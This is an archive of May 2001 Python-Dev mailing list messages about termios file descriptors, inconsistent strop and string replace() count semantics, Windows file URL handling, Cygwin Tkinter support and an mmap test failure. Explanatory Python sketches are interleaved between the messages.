Message-ID: <15097.41957.820142.77750@cj42289-a.reston1.va.home.com>

Michael Hudson writes:
 > this is a bit pointless.

  You're right!  (Hey, it was your patch. ;)
  I'm checking in a different patch -- essentially,
PyObject_AsFileDescriptor() does the right thing, and we don't ever
need to second guess it.
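Below is a rough pure-Python picture of what `PyObject_AsFileDescriptor()` does. It is a hypothetical analogue written for illustration, not the C implementation. The function accepts either an int or an object with a `fileno()` method, and it rejects negative values with the `ValueError` message quoted earlier in this thread. Because plain ints are already handled inside the function, an extra `PyInt_Check()` branch in the caller has nothing left to do.

```python
def as_file_descriptor(obj):
    """Hypothetical Python analogue of PyObject_AsFileDescriptor()."""
    if isinstance(obj, int):
        fd = obj
    else:
        fileno = getattr(obj, "fileno", None)
        if fileno is None:
            raise TypeError("argument must be an int, or have a fileno() method")
        fd = fileno()
        if not isinstance(fd, int):
            raise TypeError("fileno() returned a non-integer")
    if fd < 0:
        # Matches the message in the termios traceback quoted above.
        raise ValueError("file descriptor cannot be a negative integer (%d)" % fd)
    return fd


class FakeFile:
    """Stand-in object exposing fileno(), the way a real file object does."""

    def fileno(self):
        return 7


print(as_file_descriptor(0))
print(as_file_descriptor(FakeFile()))
```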


  -Fred

-- 
Fred L. Drake, Jr.  <fdrake at acm.org>
PythonLabs at Digital Creations


From mwh at python.net  Wed May  9 22:13:46 2001
From: mwh at python.net (Michael Hudson)
Date: 09 May 2001 21:13:46 +0100
Subject: [Python-Dev] "data".decode(encoding) ?!
In-Reply-To: "M.-A. Lemburg"'s message of "Wed, 02 May 2001 21:55:25 +0200"
References: <3AF04E3D.45AE4F4B@lemburg.com> <200105021918.OAA03080@cj20424-a.reston1.va.home.com> <3AF052CE.E928BDA1@lemburg.com> <200105021938.OAA03550@cj20424-a.reston1.va.home.com> <3AF0662D.48671B4E@lemburg.com>
Message-ID: <m38zk6s2kl.fsf@atrus.jesus.cam.ac.uk>

"M.-A. Lemburg" <mal at lemburg.com> writes:

> I've attached the patch. Due to a small reorganisation the patch is
> a little longer -- symmetry has its price at C level too ;-)

I may be being dense, but can you explain what's going on here:

->> u'\u00e3'.encode('latin-1')
'\xe3'
->> u'\u00e3'.encode("latin-1").decode("latin-1")
Traceback (most recent call last):
  File "<input>", line 1, in ?
UnicodeError: ASCII encoding error: ordinal not in range(128)

Can you come up with some other example I can use in tomorrow's
python-dev summary?
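For comparison, the round trip the example above expects is what Python 3 does. There, `str.encode()` yields `bytes` and `bytes.decode()` yields `str`. This is modern behavior, not the behavior of the 2001 patch under discussion.

```python
text = "\u00e3"                 # LATIN SMALL LETTER A WITH TILDE
data = text.encode("latin-1")   # str -> bytes
print(data)                     # the single byte 0xE3
back = data.decode("latin-1")   # bytes -> str, no ASCII step involved
print(back == text)
```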

Cheers,
M.

-- 
  Remember - if all you have is an axe, every problem looks 
  like hours of fun.                                        -- Frossie
               -- http://home.xnet.com/~raven/Sysadmin/ASR.Quotes.html


From mwh at python.net  Wed May  9 22:18:47 2001
From: mwh at python.net (Michael Hudson)
Date: 09 May 2001 21:18:47 +0100
Subject: [Python-Dev] Re: [Python-checkins] CVS: python/dist/src/Modules termios.c,2.24,2.25
References: <E14wpEP-0000fi-00@usw-pr-cvs1.sourceforge.net> <m3bsp2s3n9.fsf@atrus.jesus.cam.ac.uk> <15097.41957.820142.77750@cj42289-a.reston1.va.home.com>
Message-ID: <m33daes2c8.fsf@atrus.jesus.cam.ac.uk>

"Fred L. Drake, Jr." <fdrake at acm.org> writes:

> Michael Hudson writes:
>  > this is a bit pointless.
> 
>   You're right!  (Hey, it was your patch. ;)

So it was!  I must have uploaded a slightly stale version of the
patch, because I noticed this when cvs update conflicted with what I
had in Modules/termios.c... oops.

>   I'm checking in a different patch -- essentially,
> PyObject_AsFileDescriptor() does the right thing, and we don't ever
> need to second guess it.

I was a bit concerned that the error should contain the function name.
On reflection, I agree that the code is so much simpler that it's a
win.

Cheers,
M.

-- 
  Java sucks. [...] Java on TV set top boxes will suck so hard it
  might well inhale people from off  their sofa until their heads
  get wedged in the card slots.              --- Jon Rabone, ucam.chat


From paulp at ActiveState.com  Wed May  9 22:48:38 2001
From: paulp at ActiveState.com (Paul Prescod)
Date: Wed, 09 May 2001 13:48:38 -0700
Subject: [Python-Dev] test_urllib2 fails on Win98SE
References: <LNBBLJKPBEHFEDALKOLCAECIKBAA.tim.one@home.com>
Message-ID: <3AF9AD26.AC6DD323@ActiveState.com>

Tim Peters wrote:
> 
>...
> 
> Here's what I know about file URLs on Windows: .

We constantly run into these problems with Komodo. The long and short is
that file URL handling on Windows is totally different than on Unix and
platform-specific code is probably appropriate.

Here's what I know: IE treats the following equivalently:

c:\temp\diff.txt
file:c:\temp\diff.txt
file:/c:\temp\diff.txt
file://c:\temp\diff.txt
file:///c:\temp\diff.txt
file:///////////////////////////////c:\temp\diff.txt

You can also reverse backslashes to slashes and slashes to backslashes
if you like. Interestingly, though, UNC paths seem to work okay (no
matter how you do the slashes and backslashes):

file://americano\home\paulp\foo.html

UNC paths seem to only allow two leading slashes/backslashes.

Truly this is a new level of "be liberal in what you accept". The
algorithm is probably something like:

 1. normalize to forward slashes. 
 2. Remove "file:". 
 3. What you have left should be of the form:

//machine/path

or 

(/*)x:/path

Where x is the drive letter.
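Paul's guessed normalization steps can be sketched in Python. The helper `file_url_to_windows_path` is hypothetical, not an existing API, and is built only from the three steps above and the IE examples. It is not IE's actual algorithm, and it ignores percent-escapes, query strings, and other real-world URL details. The drive-letter form is checked first, because `//c:/...` would otherwise look like a UNC host named `c:`.

```python
import re

# (/*)x:/path -- any number of leading slashes, then a drive letter.
_DRIVE = re.compile(r"/*([A-Za-z]):/(.*)")
# //machine/path -- exactly two leading slashes (UNC form).
_UNC = re.compile(r"//([^/]+)/(.*)")


def file_url_to_windows_path(url):
    """Hypothetical helper following the lenient steps guessed above."""
    # Step 1: normalize every backslash to a forward slash.
    s = url.replace("\\", "/")
    # Step 2: strip a leading "file:" scheme, case-insensitively.
    if s[:5].lower() == "file:":
        s = s[5:]
    # Step 3a: drive-letter form (checked first, see the note above).
    m = _DRIVE.fullmatch(s)
    if m:
        drive, rest = m.groups()
        return drive + ":\\" + rest.replace("/", "\\")
    # Step 3b: UNC form, \\machine\path.
    m = _UNC.fullmatch(s)
    if m:
        host, rest = m.groups()
        return "\\\\" + host + "\\" + rest.replace("/", "\\")
    raise ValueError("unrecognized file URL: %r" % url)


print(file_url_to_windows_path(r"file:///c:\temp\diff.txt"))
print(file_url_to_windows_path(r"file://americano\home\paulp\foo.html"))
```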

-- 
Take a recipe. Leave a recipe.  
Python Cookbook!  http://www.ActiveState.com/pythoncookbook


From fredrik at effbot.org  Thu May 10 01:19:40 2001
From: fredrik at effbot.org (Fredrik Lundh)
Date: Thu, 10 May 2001 01:19:40 +0200
Subject: [Python-Dev] Re: [Python-checkins] CVS: python/dist/src/Modules stropmodule.c,2.76,2.77
References: <E14xcwW-0004E4-00@usw-pr-cvs1.sourceforge.net>
Message-ID: <05e001c0d8de$87fcb9c0$e46940d5@hagrid>

tim wrote:

> Modified Files:
> stropmodule.c 
> Log Message:
> SF bug #422088: [OSF1 alpha] string.replace().
> Platform blew up on "123".replace("123", "").  Michael Hudson pinned the
> blame on platform malloc(0) returning NULL.

any reason why the

#ifdef MALLOC_ZERO_RETURNS_NULL

macro (in pyport.h) isn't set / doesn't take care of this?

(and is it just me, or does the strop.replace function allocate
a buffer, copy the result to that buffer, only to copy it into a
string and throw the buffer away?  no wonder u"".replace() is
30% faster than "".replace() ;-)

Cheers /F


From tim at digicool.com  Thu May 10 01:39:08 2001
From: tim at digicool.com (Tim Peters)
Date: Wed, 9 May 2001 19:39:08 -0400
Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Modules stropmodule.c,2.76,2.77
In-Reply-To: <05e001c0d8de$87fcb9c0$e46940d5@hagrid>
Message-ID: <LNBBLJKPBEHFEDALKOLCGEDHKBAA.tim@digicool.com>

[Fredrik Lundh]
> any reason why the
>
> #ifdef MALLOC_ZERO_RETURNS_NULL
>
> macro (in pyport.h) isn't set / doesn't take care of this?

The code uses PyMem_MALLOC, which after a chain of umpteen #defines ends up
being plain malloc.  As Michael noted in the bug report, it could have used
PyMem_Malloc() instead and avoided the problem.  But I chose not to do that,
since special-casing a result of 0 was more efficient for reasons other than
malloc.  However:

> (and is it just me, or does the strop.replace function allocate
> a buffer, copy the result to that buffer, only to copy it into a
> string and throw the buffer away?

Yes.  And I'm returning something now that mustn't be free()'ed when the
result length is 0.  Will fix.

> no wonder u"".replace() is 30% faster than "".replace() ;-)

For a given number of characters or bytes <wink>?


From tim.one at home.com  Thu May 10 01:46:13 2001
From: tim.one at home.com (Tim Peters)
Date: Wed, 9 May 2001 19:46:13 -0400
Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Modules stropmodule.c,2.76,2.77
In-Reply-To: <LNBBLJKPBEHFEDALKOLCGEDHKBAA.tim@digicool.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCCEDIKBAA.tim.one@home.com>

Oh, fuck.  Somebody remind me why we have both stropmodule.c and
stringobject.c?  These bugs exist in both.


From mike.mellor at tbe.com  Thu May 10 02:16:28 2001
From: mike.mellor at tbe.com (mike.mellor at tbe.com)
Date: Thu, 10 May 2001 00:16:28 -0000
Subject: [Python-Dev] CygWin and Tkinter
Message-ID: <9dcmks+6aqf@eGroups.com>

I am playing around with CygWin (which came with Python 2.1
installed).  While I can run command line programs, Tkinter is not
part of the package.  TCL/TK is installed and I have been able to
build Tk GUIs.  How can I get Tkinter added to my Python package?
Thanks.

Mike


From tim.one at home.com  Thu May 10 02:47:52 2001
From: tim.one at home.com (Tim Peters)
Date: Wed, 9 May 2001 20:47:52 -0400
Subject: [Python-Dev] Inconsistent string.replace() behavior
Message-ID: <LNBBLJKPBEHFEDALKOLCGEDLKBAA.tim.one@home.com>

test_strop.py contains this line:

    test('replace', 'one!two!three!', 'one@two@three@', '!', '@', 0)

string_tests.py has this:

    test('replace', 'one!two!three!', 'one!two!three!', '!', '@', 0)

IOW, the test suite insists that

    strop.replace('one!two!three!', '!', '@', 0)

replace all matches but that

    string.replace('one!two!three!', '!', '@', 0)
and
    'one!two!three!'.replace('!', '@', 0)

replace nothing.

I've been thrashing like a madman trying to fix a common bug in both modules
(in out-of-synch copies of mymemreplace), and every time I think I fix
something "the other" module breaks.  The above appears to be why.

My opinion:  the test_strop.py test is in error, and so was strop_replace()
in stropmodule.c.  I'm checking in changes accordingly, but won't mind
getting yelled at if you disagree.
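The semantics chosen here match today's Python 3 `str.replace()`: a count of 0 replaces nothing, and a negative count (the default) replaces everything. The minimal pure-Python reference below makes that rule explicit. The name `reference_replace` is hypothetical, and the sketch deliberately does not handle an empty `old`. It also covers the empty-result `"123".replace("123", "")` case from SF bug #422088 above.

```python
def reference_replace(s, old, new, count=-1):
    """Hypothetical reference for str.replace(old, new, count) semantics."""
    if not old:
        raise ValueError("this sketch does not handle an empty 'old'")
    pieces = []
    start = 0
    done = 0
    # A negative count means "no limit"; count == 0 means replace nothing.
    while count < 0 or done < count:
        hit = s.find(old, start)
        if hit < 0:
            break
        pieces.append(s[start:hit])
        pieces.append(new)
        start = hit + len(old)
        done += 1
    pieces.append(s[start:])  # may be "", e.g. when the whole string matched
    return "".join(pieces)


for args in [("!", "@", 0), ("!", "@", -1), ("!", "@", 2)]:
    print(args, reference_replace("one!two!three!", *args))
print(repr(reference_replace("123", "123", "")))
```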


From greg at cosc.canterbury.ac.nz  Thu May 10 02:56:12 2001
From: greg at cosc.canterbury.ac.nz (Greg Ewing)
Date: Thu, 10 May 2001 12:56:12 +1200 (NZST)
Subject: [Python-Dev] gcc barfs on recent stringobject changes...
In-Reply-To: <LNBBLJKPBEHFEDALKOLCEEADKBAA.tim.one@home.com>
Message-ID: <200105100056.MAA17516@s454.cosc.canterbury.ac.nz>

Tim Peters <tim.one at home.com>:

>		PyObject *t = (PyObject *)op;
>    		PyString_InternInPlace(&t);

If you want to keep it all on one line, you could try

	PyString_InternInPlace((PyObject **)&op);

Greg Ewing, Computer Science Dept, +--------------------------------------+
University of Canterbury,	   | A citizen of NewZealandCorp, a	  |
Christchurch, New Zealand	   | wholly-owned subsidiary of USA Inc.  |
greg at cosc.canterbury.ac.nz	   +--------------------------------------+


From guido at digicool.com  Thu May 10 04:00:36 2001
From: guido at digicool.com (Guido van Rossum)
Date: Wed, 09 May 2001 21:00:36 -0500
Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Modules stropmodule.c,2.76,2.77
In-Reply-To: Your message of "Wed, 09 May 2001 19:46:13 -0400."
             <LNBBLJKPBEHFEDALKOLCCEDIKBAA.tim.one@home.com> 
References: <LNBBLJKPBEHFEDALKOLCCEDIKBAA.tim.one@home.com> 
Message-ID: <200105100200.VAA00411@cj20424-a.reston1.va.home.com>

> Oh, fuck.  Somebody remind me why we have both stropmodule.c and
> stringobject.c?  These bugs exist in both.

In my mind, strop is obsolete.  We keep it around because some losers
like to import it directly, but it's basically dead, and except for a
few functions, string.py doesn't use it any more.  (The exceptions are
maketrans, lowercase, uppercase, whitespace.)

--Guido van Rossum (home page: http://www.python.org/~guido/)


From guido at digicool.com  Thu May 10 04:01:20 2001
From: guido at digicool.com (Guido van Rossum)
Date: Wed, 09 May 2001 21:01:20 -0500
Subject: [Python-Dev] CygWin and Tkinter
In-Reply-To: Your message of "Thu, 10 May 2001 00:16:28 GMT."
             <9dcmks+6aqf@eGroups.com> 
References: <9dcmks+6aqf@eGroups.com> 
Message-ID: <200105100201.VAA00435@cj20424-a.reston1.va.home.com>

> I am playing around with CygWin (which came with Python 2.1
> installed).  While I can run command line programs, Tkinter is not
> part of the package.  TCL/TK is installed and I have been able to
> build Tk GUIs.  How can I get Tkinter added to my Python package?
> Thanks.

Beats me.  Ask whoever produces the CygWin port.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From tim.one at home.com  Thu May 10 03:07:40 2001
From: tim.one at home.com (Tim Peters)
Date: Wed, 9 May 2001 21:07:40 -0400
Subject: [Python-Dev] gcc barfs on recent stringobject changes...
In-Reply-To: <200105100056.MAA17516@s454.cosc.canterbury.ac.nz>
Message-ID: <LNBBLJKPBEHFEDALKOLCEEDNKBAA.tim.one@home.com>

>>		PyObject *t = (PyObject *)op;
>>		PyString_InternInPlace(&t);

[Greg Ewing]
> If you want to keep it all on one line, you could try
>
> 	PyString_InternInPlace((PyObject **)&op);

op is declared "register" so it's not strictly legal to apply the address-of
operator to it regardless.  Besides, Guido pays me by the line <wink>.

or-maybe-by-the-useless-checkin-to-judge-from-the-last-24-hours-ly
    y'rs  - tim


From gward at python.net  Thu May 10 03:08:58 2001
From: gward at python.net (Greg Ward)
Date: Wed, 9 May 2001 21:08:58 -0400
Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Modules stropmodule.c,2.76,2.77
In-Reply-To: <200105100200.VAA00411@cj20424-a.reston1.va.home.com>; from guido@digicool.com on Wed, May 09, 2001 at 09:00:36PM -0500
References: <LNBBLJKPBEHFEDALKOLCCEDIKBAA.tim.one@home.com> <200105100200.VAA00411@cj20424-a.reston1.va.home.com>
Message-ID: <20010509210858.A3467@gerg.ca>

On 09 May 2001, Guido van Rossum said:
> In my mind, strop is obsolete.  We keep it around because some losers
> like to import it directly, but it's basically dead, and except for a
> few functions, string.py doesn't use it any more.  (The exceptions are
> maketrans, lowercase, uppercase, whitespace.)

Perhaps 2.2 should deprecate direct use of strop noisily -- warn when
imported, except when imported by string.py.  (No idea how you'd
implement that, I'm just spouting off.)  Then it could go away in 2.3.

I don't think there's anything particularly controversial about 'strop'
going away after one release with a deprecation warning -- it's not
'string', after all!  (I.e., imported by every single scrap of Python code
ever written before string methods came along, and by quite a lot since
then.)

        Greg
-- 
Greg Ward - nerd                                        gward at python.net
http://starship.python.net/~gward/
I joined scientology at a garage sale!!


From guido at digicool.com  Thu May 10 04:12:55 2001
From: guido at digicool.com (Guido van Rossum)
Date: Wed, 09 May 2001 21:12:55 -0500
Subject: [Python-Dev] Inconsistent string.replace() behavior
In-Reply-To: Your message of "Wed, 09 May 2001 20:47:52 -0400."
             <LNBBLJKPBEHFEDALKOLCGEDLKBAA.tim.one@home.com> 
References: <LNBBLJKPBEHFEDALKOLCGEDLKBAA.tim.one@home.com> 
Message-ID: <200105100212.VAA00491@cj20424-a.reston1.va.home.com>

> test_strop.py contains this line:
> 
>     test('replace', 'one!two!three!', 'one@two@three@', '!', '@', 0)
> 
> string_tests.py has this:
> 
>     test('replace', 'one!two!three!', 'one!two!three!', '!', '@', 0)
> 
> IOW, the test suite insists that
> 
>     strop.replace('one!two!three!', '!', '@', 0)
> 
> replace all matches but that
> 
>     string.replace('one!two!three!', '!', '@', 0)
> and
>     'one!two!three!'.replace('!', '@', 0)
> 
> replace nothing.
> 
> I've been thrashing like a madman trying to fix a common bug in both modules
> (in out-of-synch copies of mymemreplace), and every time I think I fix
> something "the other" module breaks.  The above appears to be why.
> 
> My opinion:  the test_strop.py test is in error, and so was strop_replace()
> in stropmodule.c.  I'm checking in changes accordingly, but won't mind
> getting yelled at if you disagree.

HMMMMMM!  In Python 1.5, a count of zero always replaces all
occurrences, both using string and using strop.  In 2.0 and later,
strop's replace(..., 0) still replaces all, but string's replaces
none.  The replace() method of strings and unicode objects agrees with
string.py.

I think this change was made for the sake of ease of documenting the
behavior: special-casing the count of zero is unexpected.

I very vaguely recall that it was discussed on this list.

So this suggests that test_string is correct, and string.replace()
(and the methods) shouldn't be "fixed"!

But since we're not really supporting strop any more, I think that
strop shouldn't be changed either.  So we'll have to live with the
difference -- sorry!

--Guido van Rossum (home page: http://www.python.org/~guido/)


From tim.one at home.com  Thu May 10 03:13:20 2001
From: tim.one at home.com (Tim Peters)
Date: Wed, 9 May 2001 21:13:20 -0400
Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Modules stropmodule.c,2.76,2.77
In-Reply-To: <200105100200.VAA00411@cj20424-a.reston1.va.home.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCGEDOKBAA.tim.one@home.com>

[Guido]
> In my mind, strop is obsolete.  We keep it around because some losers
> like to import it directly, but it's basically dead, and except for a
> few functions, string.py doesn't use it any more.  (The exceptions are
> maketrans, lowercase, uppercase, whitespace.)

So if Fred changes the docs to say it's obsolete, maybe we can actually rip
out the buggy and redundant code it contains in about 2 years <wink>.

cheeredly y'rs  - tim


From guido at digicool.com  Thu May 10 04:25:43 2001
From: guido at digicool.com (Guido van Rossum)
Date: Wed, 09 May 2001 21:25:43 -0500
Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Modules stropmodule.c,2.76,2.77
In-Reply-To: Your message of "Wed, 09 May 2001 21:08:58 -0400."
             <20010509210858.A3467@gerg.ca> 
References: <LNBBLJKPBEHFEDALKOLCCEDIKBAA.tim.one@home.com> <200105100200.VAA00411@cj20424-a.reston1.va.home.com>  
            <20010509210858.A3467@gerg.ca> 
Message-ID: <200105100225.VAA00592@cj20424-a.reston1.va.home.com>

> Perhaps 2.2 should deprecate direct use of strop noisily -- warn when
> imported, except when imported by string.py.  (No idea how you'd
> implement that, I'm just spouting off.)  Then it could go away in 2.3.

I have had the necessary mods sitting in my directory for months (it
was one of my first tests for using the warnings module), but decided
against checking it in because I found there's quite a bit of code
that triggered the warnings.  Maybe I should check it into 2.2a0,
so developers can get used to it.

> I don't think there's anything particularly controversial about 'strop'
> going away after one release with a deprecation warning -- it's not
> 'string', after all!  (I.e., imported by every single scrap of Python code
> ever written before string methods came along, and by quite a lot since
> then.)

Agreed.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From guido at digicool.com  Thu May 10 04:27:23 2001
From: guido at digicool.com (Guido van Rossum)
Date: Wed, 09 May 2001 21:27:23 -0500
Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Modules stropmodule.c,2.76,2.77
In-Reply-To: Your message of "Wed, 09 May 2001 21:13:20 -0400."
             <LNBBLJKPBEHFEDALKOLCGEDOKBAA.tim.one@home.com> 
References: <LNBBLJKPBEHFEDALKOLCGEDOKBAA.tim.one@home.com> 
Message-ID: <200105100227.VAA00607@cj20424-a.reston1.va.home.com>

> [Guido]
> > In my mind, strop is obsolete.  We keep it around because some losers
> > like to import it directly, but it's basically dead, and except for a
> > few functions, string.py doesn't use it any more.  (The exceptions are
> > maketrans, lowercase, uppercase, whitespace.)
> 
> So if Fred changes the docs to say it's obsolete, maybe we can actually rip
> out the buggy and redundant code it contains in about 2 years <wink>.

Yes, but in the mean time the fact that it's buggy doesn't bother me
at all.  Let it be as buggy as it always was -- that's one more reason
to stop using it! :-)

--Guido van Rossum (home page: http://www.python.org/~guido/)


From tim.one at home.com  Thu May 10 03:33:52 2001
From: tim.one at home.com (Tim Peters)
Date: Wed, 9 May 2001 21:33:52 -0400
Subject: [Python-Dev] Inconsistent string.replace() behavior
In-Reply-To: <200105100212.VAA00491@cj20424-a.reston1.va.home.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCEEDPKBAA.tim.one@home.com>

[Guido]
> HMMMMMM!  In Python 1.5, a count of zero always replaces all
> occurrences, both using string and using strop.  In 2.0 and later,
> strop's replace(..., 0) still replaces all, but string's replaces
> none.  The replace() method of strings and unicode objects agrees with
> string.py.
>
> I think this change was made for the sake of ease of documenting the
> behavior: special-casing the count of zero is unexpected.

Yes, -1 == infinity is much clearer <wink>.

> I very vaguely recall that it was discussed on this list.
>
> So this suggests that test_string is correct, and string.replace()
> (and the methods) shouldn't be "fixed"!

I didn't change their behavior wrt replace()'s interpretation of count; I
only touched them to repair an unrelated bug (bogus MemoryError for an
empty-string *result*) that happened to appear in both copies of mymemreplace
sitting in the code base (one in stringobject.c, another, out-of-synch one in
stropmodule.c).
That's how stropmodule got sucked into this:  to fix the gross null-string
result bug common to both.

> But since we're not really supporting strop any more, I think that
> strop shouldn't be changed either.  So we'll have to live with the
> difference -- sorry!

OK, I've restored the 0 == infinity semantics to strop.replace() and
test_strop.py, but have not backed out the null-string result fix, nor the
pain to make the mymemreplace clones identical again.
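In modern Python 3 the behavior Guido describes still holds. For str.replace(), a count of 0 replaces nothing and a negative count replaces everything; the default is -1. The helper below is a hypothetical emulation of strop's legacy "0 means replace all" rule. It is not code from either module, and the name legacy_strop_replace is illustrative only.

```python
def legacy_strop_replace(s, old, new, maxreplace=0):
    """Hypothetical emulation of strop.replace(): a count of 0 means "all".

    str.replace() treats any negative count as "no limit", so mapping
    0 to -1 reproduces the old strop rule; positive counts pass through.
    """
    count = -1 if maxreplace == 0 else maxreplace
    return s.replace(old, new, count)


s = "one!two!three!"
print(s.replace("!", "@", 0))                      # one!two!three!
print(s.replace("!", "@"))                         # one@two@three@
print(legacy_strop_replace(s, "!", "@", 0))        # one@two@three@
print(legacy_strop_replace(s, "!", "@", 1))        # one@two!three!
print(repr(legacy_strop_replace("!!", "!", "")))   # '' (an empty result is legal)
```

The last line exercises the empty-string result that triggered the bogus MemoryError Tim fixed.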


From tim.one at home.com  Thu May 10 04:00:30 2001
From: tim.one at home.com (Tim Peters)
Date: Wed, 9 May 2001 22:00:30 -0400
Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Modules stropmodule.c,2.76,2.77
In-Reply-To: <200105100227.VAA00607@cj20424-a.reston1.va.home.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCKEEBKBAA.tim.one@home.com>

[Guido]
> Yes, but in the mean time the fact that it's buggy doesn't bother me
> at all.  Let it be as buggy as it always was -- that's one more reason
> to stop using it! :-)

I think that's unsustainable in this specific case:  stringobject and
stropmodule contained several utility functions with the same names that
clearly started life as identical code.  Over time they got out of synch, and
when they punched me in the face today, I had no idea which was "right" and
which "wrong".  Turned out they both had the same bug, and the clearest way
to fix it in stringobject.c without leaving a more inconsistent x-module mess
was to bring the once-common utility routines back into synch.

As /F said, though, the mymemreplace() approach is inefficient and "should
be" replaced wholesale.  If that's done in stringobject.c alone, great, then
I won't care about the legacy routines in stropmodule.c either.  What I can't
abide is having one copy of a function in the codebase work and a clone of it
not work -- unless you can keep the undocumented history of both in your mind
at all times, you're just as likely to bump into the broken one first when
searching the code base, and if you're unlucky never even realize it is "the
broken one" (or, if you're lucky, bump into the good one too, and then pee
away time trying to understand the differences).

i-have-garbage-in-my-kitchen-too-but-i-put-it-in-a-bag-so-i-don't-
    eat-it-by-mistake<wink>-ly y'rs  - tim


From Jason.Tishler at dothill.com  Thu May 10 04:06:15 2001
From: Jason.Tishler at dothill.com (Jason Tishler)
Date: Wed, 9 May 2001 22:06:15 -0400
Subject: [Python-Dev] CygWin and Tkinter
In-Reply-To: <200105100201.VAA00435@cj20424-a.reston1.va.home.com>; from guido@digicool.com on Wed, May 09, 2001 at 09:01:20PM -0500
References: <9dcmks+6aqf@eGroups.com> <200105100201.VAA00435@cj20424-a.reston1.va.home.com>
Message-ID: <20010509220615.A1928@dothill.com>

Mike,

On Wed, May 09, 2001 at 09:01:20PM -0500, Guido van Rossum wrote:
> > I am playing around with CygWin (which came with Python 2.1 
> > installed).  While I can run command line programs, Tkinter is not 
> > part of the package.  Tcl/Tk is installed and I have been able to 
> > build Tk GUIs.  How can I get Tkinter added to my Python package?  
> > Thanks.
> 
> Beats me.  Ask whoever produces the CygWin port.

I am the Cygwin Python maintainer.  Please see the following for my
views on adding Tkinter support to Cygwin Python:

    http://sources.redhat.com/ml/cygwin/2001-04/msg01842.html

If Tkinter support is important to you, then please submit the appropriate
patches for consideration to the Python Patch Manager on SourceForge.

Norman Vine has built a Cygwin Python that supports Tkinter.  See the
following for his build procedure:

    http://www.vso.cape.com/~nhv/files/python/

Perhaps you would like to collaborate with Norman on this effort?

Thanks,
Jason

-- 
Jason Tishler
Director, Software Engineering       Phone: +1 (732) 264-8770 x235
Dot Hill Systems Corp.               Fax:   +1 (732) 264-8798
82 Bethany Road, Suite 7             Email: Jason.Tishler at dothill.com
Hazlet, NJ 07730 USA                 WWW:   http://www.dothill.com


From tim.one at home.com  Thu May 10 04:54:45 2001
From: tim.one at home.com (Tim Peters)
Date: Wed, 9 May 2001 22:54:45 -0400
Subject: [Python-Dev] test_mmap failing?
Message-ID: <LNBBLJKPBEHFEDALKOLCKEEDKBAA.tim.one@home.com>

I checked in a change to mmapmodule.c earlier today, to close a patch
complaining about unused-variable warnings.

Here's the changed routine before ("value" is unused):

mmap_read_byte_method(mmap_object *self,
                      PyObject *args)
{
        char value;
        char *where;
        CHECK_VALID(NULL);
        if (!PyArg_ParseTuple(args, ":read_byte"))
                return NULL;
        if (self->pos < self->size) {
                where = self->data + self->pos;
                value = (char) *(where);
                self->pos += 1;
                return Py_BuildValue("c", (char) *(where));
        } else {
                PyErr_SetString (PyExc_ValueError, "read byte out of range");
                return NULL;
        }
}

and after:

mmap_read_byte_method(mmap_object *self,
                      PyObject *args)
{
        CHECK_VALID(NULL);
        if (!PyArg_ParseTuple(args, ":read_byte"))
                return NULL;
        if (self->pos < self->size) {
                char value = self->data[self->pos];
                self->pos += 1;
                return Py_BuildValue("c", value);
        } else {
                PyErr_SetString (PyExc_ValueError, "read byte out of range");
                return NULL;
        }
}
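The routine above backs the read_byte() method of mmap objects. The minimal Python 3 sketch below shows its observable behavior. Each call returns the byte at the current position and advances the position, and reading at the end raises ValueError.

A few assumptions apply:
- It uses an anonymous mapping (fileno -1), so no file such as "foo" is involved.
- In Python 3, read_byte() returns an int rather than a one-character string.
- The helper name read_all_bytes is hypothetical.

```python
import mmap


def read_all_bytes(m):
    """Call m.read_byte() repeatedly until it raises ValueError."""
    values = []
    while True:
        try:
            values.append(m.read_byte())  # returns an int in Python 3
        except ValueError:
            # raised once the position reaches the end of the map
            break
    return values


m = mmap.mmap(-1, 3)  # anonymous 3-byte mapping, initially zero-filled
m.write(b"abc")
m.seek(0)
print(read_all_bytes(m))  # [97, 98, 99]
m.close()
```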

I'll be damned if I can see any semantic difference, and test_mmap worked
fine on Windows after the change.  But Fred reported:

"""
the fix introduced breakage on Linux (kernel 2.2.17):

cj42289-a(.../python/linux-beowolf); ./python ../Lib/test/regrtest.py -v test_mmap
test_mmap
test_mmap
test test_mmap crashed -- exceptions.IOError: [Errno 22] Invalid argument
Traceback (most recent call last):
  File "../Lib/test/regrtest.py", line 246, in runtest
    __import__(test, globals(), locals(), [])
  File "../Lib/test/test_mmap.py", line 124, in ?
    test_both()
  File "../Lib/test/test_mmap.py", line 14, in test_both
    f.write('\0'* PAGESIZE)
IOError: [Errno 22] Invalid argument
1 test failed: test_mmap
"""

However, at the point that's failing, test_mmap hasn't even *created* an
mmap'ed file yet, let alone tried to read from it.  The only thing test_mmap
did so far is (the first comment is bogus -- that's the builtin Python open()
function):

    # Create an mmap'ed file   # THIS IS A BOGUS COMMENT
    f = open('foo', 'w+')

    # Write 2 pages worth of data to the file
    f.write('\0'* PAGESIZE)    # THIS IS THE LINE IT'S DYING ON

But having suffered too many "impossible problems" the last 36 hours, my
confidence is shot <0.93 wink>.  Is test_mmap failing for anyone else under
current CVS?  Fred, are you *sure* it fails for you -- if so, does the
problem actually go away if you revert mmapmodule.c?

looking-for-sense-in-all-the-wrong-places-ly y'rs  - tim


From jeremy at digicool.com  Thu May 10 05:17:34 2001
From: jeremy at digicool.com (Jeremy Hylton)
Date: Wed, 9 May 2001 23:17:34 -0400 (EDT)
Subject: [Python-Dev] test_mmap failing?
In-Reply-To: <LNBBLJKPBEHFEDALKOLCKEEDKBAA.tim.one@home.com>
References: <LNBBLJKPBEHFEDALKOLCKEEDKBAA.tim.one@home.com>
Message-ID: <15098.2126.368714.159135@slothrop.digicool.com>

The latest CVS build works on my Linux 2.2.12 system.  No problem with
test_mmap.  But test_pty does fail with some complaints about FCNTL,
